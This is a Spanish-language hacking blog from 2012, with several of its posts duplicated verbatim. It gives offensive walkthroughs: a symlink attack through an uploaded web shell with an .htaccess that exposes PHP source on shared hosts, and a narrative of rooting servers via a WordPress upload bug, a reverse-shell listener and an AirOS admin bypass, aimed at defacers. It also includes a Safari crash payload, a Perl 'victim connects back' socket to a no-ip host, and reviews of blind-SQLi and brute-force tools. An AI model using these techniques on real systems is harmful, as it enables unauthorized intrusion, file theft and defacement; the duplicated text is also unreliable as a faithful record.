Desde hace meses esta técnica pasó de mano en manó por una t00l en Perl y un PHP, porsupuesto uno no se tiene que quedar detrás de la t00l ir un poco mas hayá no cuesta nada y la verdad es que no tenía idea muy bien como funcionaba eso del symlink soy linuxero pero no había provado esto... entonces comenzé a preguntar por aquí por haya y no fue hasta algo que pasó en el trabajo que me hizo entender le debo mucho a R.S que con un comando me hizo entrar en razón hizo lo siguiente en la consola...
ln -s /var/www/test/
ahí dije pobre hijuepu... entendí la puta técnica sabía usar la t00l pero no es lo mismo...
ahora les explico lo que el symlink hace es crear un Link Symbólico pero el contenido es el mismo que el del link natural por ejemplo...
yo entro a la pc de mi pata entonces quiero entrar a la carpeta /www/ porque me quiero sacar su config.php pero tiene un culo de carpetas y no tengo tanto tiempo facilito noma my friend vamos a crear un link symbolico de toda su /www/ creamos otro directorio llamado sym y por consola ponemos ln -s /var/www/wordpress/ entonces me va a sacar todos los archivos de su wordpress y me los pone en sym entonces ya lo tengo para leer todo asi es hermano todo todo... pero vamos un poco mas hayá al blackhat que es lo que te gusta jajaja como lo aplicamos...
Vamos a este server que tiene 3k de páginas... pero su kernel no es r00teable o mejor dicho aun no sale el r00t-expl0it que quieres... entonces le damos de la siguiente manera...
usen su shell de preferencia... pongansé en el public_html es decir algo asi:
http://webvulnerada.com/aquilashell.php
luego vamos a la consola de comandos... y vamos a crear un directorio:
mkdir tutobydedal0
entonces eso quiere decir que podemos entrar a una ruta así http://webvulnerada.com/tutobydedal0/
listo ahora en la shell vamos a navegar a este directorio que hemos creado y vamos a subir un .htaccess con lo siguiente...
Options Indexes FollowSymLinks
DirectoryIndex evitandoel403.htm
AddType txt .php
AddHandler txt .php
Bueno ahora en este directorio vamos a ejecutar esto en la consola:
ln -s /root
OJO el root puede variar dependiendo del hosting... pero básicamente es el directorio principal en tu consola normalmente te sale la ruta de la shell sale algo asi:
/home/sddf/public_html algo asi tu tienes que ir al primer slash que normalmente es /root bueno ahora si cuando hemos hecho esto vamos a través de la shell a la carpeta tutobydedal0
aja! te quedaste loco no? hay una carpeta llamada root entra y verás varias carpetas entra a home... /sdsdsfd /sdffgjjf /hola /web233 /jsjsdjd ajam.. varios sites ahora un wordpress y entra por url asi:
http://webvulnerada.com/tutobydedal0/root/home/aquihayunblogmepasede8caracteres/blog/
install.php <-- xD te emocionaste? se puede ver el codigo fuente del PHP...
Si te topas con un error 500 te dejo la duda de porque no se puede ver... investiga un poco mas o espera el siguiente post de symlink en el cual postearé una t00lsita que estoy programando aun...
Saludos,
Dedalo
lunes 27 de febrero de 2012
miércoles 25 de enero de 2012
Hattrick: Rooteando mas de 3 Servers en una Noche
Bueno esto que les voy a relatar ahora mismo es como rootearse fácilmente 3 servidores en una noche y uno que otro como para hacer mass (esto para los defacers):
Necesitamos una web vulnerable o en mi caso tengo una shell ya uploaded como la subí...
http://xxxx.com/ --> Web de un colegio... (es VPS la info del dominio dice comprado en el año 2003).
Buscando bien tienen un blog ya en desuso donde suben al parecer cosas de deporte... busco y tiene un complemento bugged de wordpres... su bug:
Remote File Uploading...
le pido a un colega una shell xD porque la verdad en mi pc ya no se encuentran muchas shells tengo que actualizar me da una bien interesante... luego le hago el upload... año del kernel 2007 lo que si tengo son root exploits, pongo en escucha mi nc...
ncat -v -l -p 6666 me conecto de manera reversa y listo a ejecutar...
./ex y listo estamos... ahora los otros dos está mas fácil aun vamos a usar este bug que me parecio interesantisimo:
http://186.38.2.70/login.cgi?uri=/ los AirOs tienen un bugsaso que segun yo es un bug lucrativo porque ya es muy notorio y practicamente es un backd00r...
cambias la ruta login.cgi por admin.cgi/sd.css y tienes una shell como esta:
para que mas diganme ustedes puden subir todo lo que quieran y tendrán servidores owned como quieran... encontrarlos es facilisisisisisisisimo yo encontré por lo menos 20 vulnerables en una noche... cuantos encuentran ustedes...
Saludos,
Dr.White
Necesitamos una web vulnerable o en mi caso tengo una shell ya uploaded como la subí...
http://xxxx.com/ --> Web de un colegio... (es VPS la info del dominio dice comprado en el año 2003).
Buscando bien tienen un blog ya en desuso donde suben al parecer cosas de deporte... busco y tiene un complemento bugged de wordpres... su bug:
Remote File Uploading...
le pido a un colega una shell xD porque la verdad en mi pc ya no se encuentran muchas shells tengo que actualizar me da una bien interesante... luego le hago el upload... año del kernel 2007 lo que si tengo son root exploits, pongo en escucha mi nc...
ncat -v -l -p 6666 me conecto de manera reversa y listo a ejecutar...
./ex y listo estamos... ahora los otros dos está mas fácil aun vamos a usar este bug que me parecio interesantisimo:
http://186.38.2.70/login.cgi?uri=/ los AirOs tienen un bugsaso que segun yo es un bug lucrativo porque ya es muy notorio y practicamente es un backd00r...
cambias la ruta login.cgi por admin.cgi/sd.css y tienes una shell como esta:
para que mas diganme ustedes puden subir todo lo que quieran y tendrán servidores owned como quieran... encontrarlos es facilisisisisisisisimo yo encontré por lo menos 20 vulnerables en una noche... cuantos encuentran ustedes...
Saludos,
Dr.White
Provocando Pantalla Azul a travéz de Safari
Bueno para que mentir xD me dio pereza levantar una virtual y lo prové en mi maquina normal... Funciona Así...
Vas a tu hosting y subes un archivo llamado cualquiernombre.html y dentro le pones algo tan simple como esto:
<iframe height='18082563'></iframe>
no tube tiempo de probar con otras cantidades en el height pero si lo probe poner en la etiqueta img pero no funcionó... sirve para que? en realidad para nada mas que trollear salvo que ustedes le puedan dar un uso un poco mas util que yo :)
Datos del que lo encontró:
# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil
yo probé también en win 7 en 64 bits...
Saludos,
Dr.White
Vas a tu hosting y subes un archivo llamado cualquiernombre.html y dentro le pones algo tan simple como esto:
<iframe height='18082563'></iframe>
no tube tiempo de probar con otras cantidades en el height pero si lo probe poner en la etiqueta img pero no funcionó... sirve para que? en realidad para nada mas que trollear salvo que ustedes le puedan dar un uso un poco mas util que yo :)
Datos del que lo encontró:
# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil
yo probé también en win 7 en 64 bits...
Saludos,
Dr.White
miércoles 11 de enero de 2012
Conexion Inversa Orientado a Malware
Escribo esto para explicarles masomenos como funcionan algunos malwares que se desarrollan ahora.
Lo que hacen es que las personas se conecten a la PC del Atacante y no El Atacante a la PC de la Víctima.
Set My PC:
Vamos a hacer lo siguiente, vamos a http://www.no-ip.com/ y nos vamos a registrar luego nos logueamos y vamos a ir a la pestaña Add a Host del Menu.
En El Host Name Ponemos SeguridadBlanca o bueno lo que deseen en este caso será SeguridadBlanca y al lado seleccionan lo que quieren yo escogí no-ip.org.
En la opcion de abajo donde dice: Host Type ponganlo en DNS Host (A) en la ip dejenla como está. Luego denle click al Boton Create Host.
Ahora Deben de Bajarse el Client de No-IP:
Download desde aquí yo en este caso estoy booteando mi win7 asi que me bajo la version para windows :)
Ahora me la bajo instalo todo y cuando abro me pide que me loguee, me logueo con mi cuenta de no-ip y aparecerá SeguridadBlanca.no-ip.org seleccionan el checkbox y ponen Save... luego les deben de salir tres checks:
Client ID
Updating
IP
si no te salen los tres checks es porque hay algo mal xD no funcionará muy bien si sales por proxy o estás en la oficina donde te bloquean cosas.
Ahora lo anterior de Setiar el no-ip es por dos motivos: El primero es porque nuestra ip cambia constantemente por lo menos en mi pais es así entonces para no tener que estar cambiando y cambiando pues usamos el no-ip que nos mantiene una ip seguridadblanca.no-ip.org y el otro motivo es para un tema de ocultar nuestra ip.
Ahora vamos a crear la conexion inversa.
use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => 'seguridadblanca.no-ip.org',
PeerPort => '90',
Proto => 'tcp',
);
die "No se creo el socket: $!\n" unless $sock;
print $sock "Soy tu Victima\n";
close($sock);
Bueno con eso se nos conecta la victima :)
aqui tambien tienen un chat en visual basic basado en sockets que pueden usar... adapten los sockets nomas bueno y ese code de perl es solo para hacer la conexion luego nuestro server debe correr en el puerto 90 y genial tenemos a las victimas conectadas a nosotros.
Saludos,
Camilo G.
Lo que hacen es que las personas se conecten a la PC del Atacante y no El Atacante a la PC de la Víctima.
Set My PC:
Vamos a hacer lo siguiente, vamos a http://www.no-ip.com/ y nos vamos a registrar luego nos logueamos y vamos a ir a la pestaña Add a Host del Menu.
En El Host Name Ponemos SeguridadBlanca o bueno lo que deseen en este caso será SeguridadBlanca y al lado seleccionan lo que quieren yo escogí no-ip.org.
En la opcion de abajo donde dice: Host Type ponganlo en DNS Host (A) en la ip dejenla como está. Luego denle click al Boton Create Host.
Ahora Deben de Bajarse el Client de No-IP:
Download desde aquí yo en este caso estoy booteando mi win7 asi que me bajo la version para windows :)
Ahora me la bajo instalo todo y cuando abro me pide que me loguee, me logueo con mi cuenta de no-ip y aparecerá SeguridadBlanca.no-ip.org seleccionan el checkbox y ponen Save... luego les deben de salir tres checks:
Client ID
Updating
IP
si no te salen los tres checks es porque hay algo mal xD no funcionará muy bien si sales por proxy o estás en la oficina donde te bloquean cosas.
Ahora lo anterior de Setiar el no-ip es por dos motivos: El primero es porque nuestra ip cambia constantemente por lo menos en mi pais es así entonces para no tener que estar cambiando y cambiando pues usamos el no-ip que nos mantiene una ip seguridadblanca.no-ip.org y el otro motivo es para un tema de ocultar nuestra ip.
Ahora vamos a crear la conexion inversa.
use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => 'seguridadblanca.no-ip.org',
PeerPort => '90',
Proto => 'tcp',
);
die "No se creo el socket: $!\n" unless $sock;
print $sock "Soy tu Victima\n";
close($sock);
Bueno con eso se nos conecta la victima :)
aqui tambien tienen un chat en visual basic basado en sockets que pueden usar... adapten los sockets nomas bueno y ese code de perl es solo para hacer la conexion luego nuestro server debe correr en el puerto 90 y genial tenemos a las victimas conectadas a nosotros.
Saludos,
Camilo G.
Arachni Open Source Security Scanner
Arachni es un "nuevo" FrameWork Open Source Desarrollado en Ruby Para Analizar Bugs en Websites y asi ayudar a que tu web deje de ser vulnerable.
Su funcionamiento básicamente es que hace una especie de SiteMap y luego basado en las url obtenidas comienza a hacer un escaneo, la velocidad es normal ni rápido ni lento y no es tan noob friendly.
Corre en Linux y para Windows viene con librerias Cygwin.
Para ver mas información puedes consultar aquí.
Descarga:
Linux
Windows
Desde que me desperté lo anduve provando en localhost en linux, y funciona bien lo unico malo es que a veces como que se lentejea o si el bug hace redirección lo caga al scanner tambien.
Saludos,
Dr.White
Su funcionamiento básicamente es que hace una especie de SiteMap y luego basado en las url obtenidas comienza a hacer un escaneo, la velocidad es normal ni rápido ni lento y no es tan noob friendly.
Corre en Linux y para Windows viene con librerias Cygwin.
Para ver mas información puedes consultar aquí.
Descarga:
Linux
Windows
Desde que me desperté lo anduve provando en localhost en linux, y funciona bien lo unico malo es que a veces como que se lentejea o si el bug hace redirección lo caga al scanner tambien.
Saludos,
Dr.White
domingo 8 de enero de 2012
Absinthe Blind SQL Injection Tool
Sinceramente me cuesta demaciado inyectar sql blind principalmente por que soy desesperado y eso de estar esperando no va conmigo, asi que bueno encontré esta tool en un foro y me parecio bien interesante la prové con una web de un amigo que tiene blind y la verdad es que el scanner es un poco lento pero funciona bien.
Caracteristicas:
- Totalmente automático, no encuentra la sqli tu se la debes dar.
- Inyecta MSsql, Postgres Sql y Oracle.
- Puedes editar el query.
- Soporta proxy.
- GUI.
- Algunas Más.
Mi Experiencia: Yo la prové en una blind en la web de un amigo, era MySql, aun no he tenido la oportunidad de provarlos con las otras bds pero en mysql corrió perfectamente.
Descarga
Informacion y Documentacion
Caracteristicas:
- Totalmente automático, no encuentra la sqli tu se la debes dar.
- Inyecta MSsql, Postgres Sql y Oracle.
- Puedes editar el query.
- Soporta proxy.
- GUI.
- Algunas Más.
Mi Experiencia: Yo la prové en una blind en la web de un amigo, era MySql, aun no he tenido la oportunidad de provarlos con las otras bds pero en mysql corrió perfectamente.
Descarga
Informacion y Documentacion
Te quedó chico el hydra? Patator!
Patator es un nuevo brute forcer que basa sus características en los errores y complejidades que tienen herramientas como el hydra, el medusa, el brutus, el ncrack y muchas otras herramientas, quien una vez no quizo hacer una herramienta de bruteforce que se le adapte a sus necesidades... este tipo del Patator la ha desarrollado para ti.
Desventajas de algunas tools:
- Lentas.
- Dan Resultados Falsos.
- No Funcionan.
- Son muy simples.
Ventajas del Patator:
- Multithread (Es rápido)
- Sus Resultados realmente se basan en codigo.
- Muchos mas.
Sus Características:
ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files
Las que he provado:
Brute-Force SSH
Brute-Force FTP
Brute-Force Telnet
Brute-Force Mysql
Lo que he notado de la tool, no es tanto que sea muy diferente a las otras, lo que he visto es que el código, escrito en python, está mas limpio y además, es más rapido que cualquier otro que haya provado.
Descarga
Mas Información
Saludos,
Dr.White
Desventajas de algunas tools:
- Lentas.
- Dan Resultados Falsos.
- No Funcionan.
- Son muy simples.
Ventajas del Patator:
- Multithread (Es rápido)
- Sus Resultados realmente se basan en codigo.
- Muchos mas.
Sus Características:
ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files
Las que he provado:
Brute-Force SSH
Brute-Force FTP
Brute-Force Telnet
Brute-Force Mysql
Lo que he notado de la tool, no es tanto que sea muy diferente a las otras, lo que he visto es que el código, escrito en python, está mas limpio y además, es más rapido que cualquier otro que haya provado.
Descarga
Mas Información
Saludos,
Dr.White
Nuevas Vibras para SeguridadBlanca
Bueno desde el día de hoy comenzaré a dedicarle mas tiempo al blog no solo para poner tutoriales hechos por mi sino también artículos de interes que sé que los podrán necesitar en algún momento.
Saludos,
Dr.White
Saludos,
Dr.White
miércoles 4 de enero de 2012
Sql Injection en ESET LATINOAMERICA
Bueno Resulta que hace tiempo yo trabajaba como freelance en una blog de malware me pagaban 100$ al mes ademas de una recompensa si es que uno de mis posts era el favorito del mes... y en una de las veces que decidi hacerle un escaneo con las manos como a mi me gusta yo no soy mucho de tools por que siempre la creatividad humana será mejor que la de un bot pero bueno analizo y encontré que habia una sqlinjection caletasa el cms que usabamos era un sistema de noticias no recuerdo cual tuneado por un programador de php que estaba mucho tiempo atras en el website la sqli estaba en el buscador... era simple tan facil como una comilla... el bug es parecidisimo al que encontré en ESET, un video donde les muestro que habia una sqli en eset, confirme que se podia hacer union y select. esto se puede reparar con un mysqlscapestrings a porcierto no le pongan muchos filtros a su web por que sino se van a ver puros backslash(\) por toda su web como la web de una empresa peruana que es tan insegura de como filtrar que filtra hasta los echo...
Saludos,
Dr.White
Saludos,
Dr.White
Suscribirse a:
Entradas (Atom)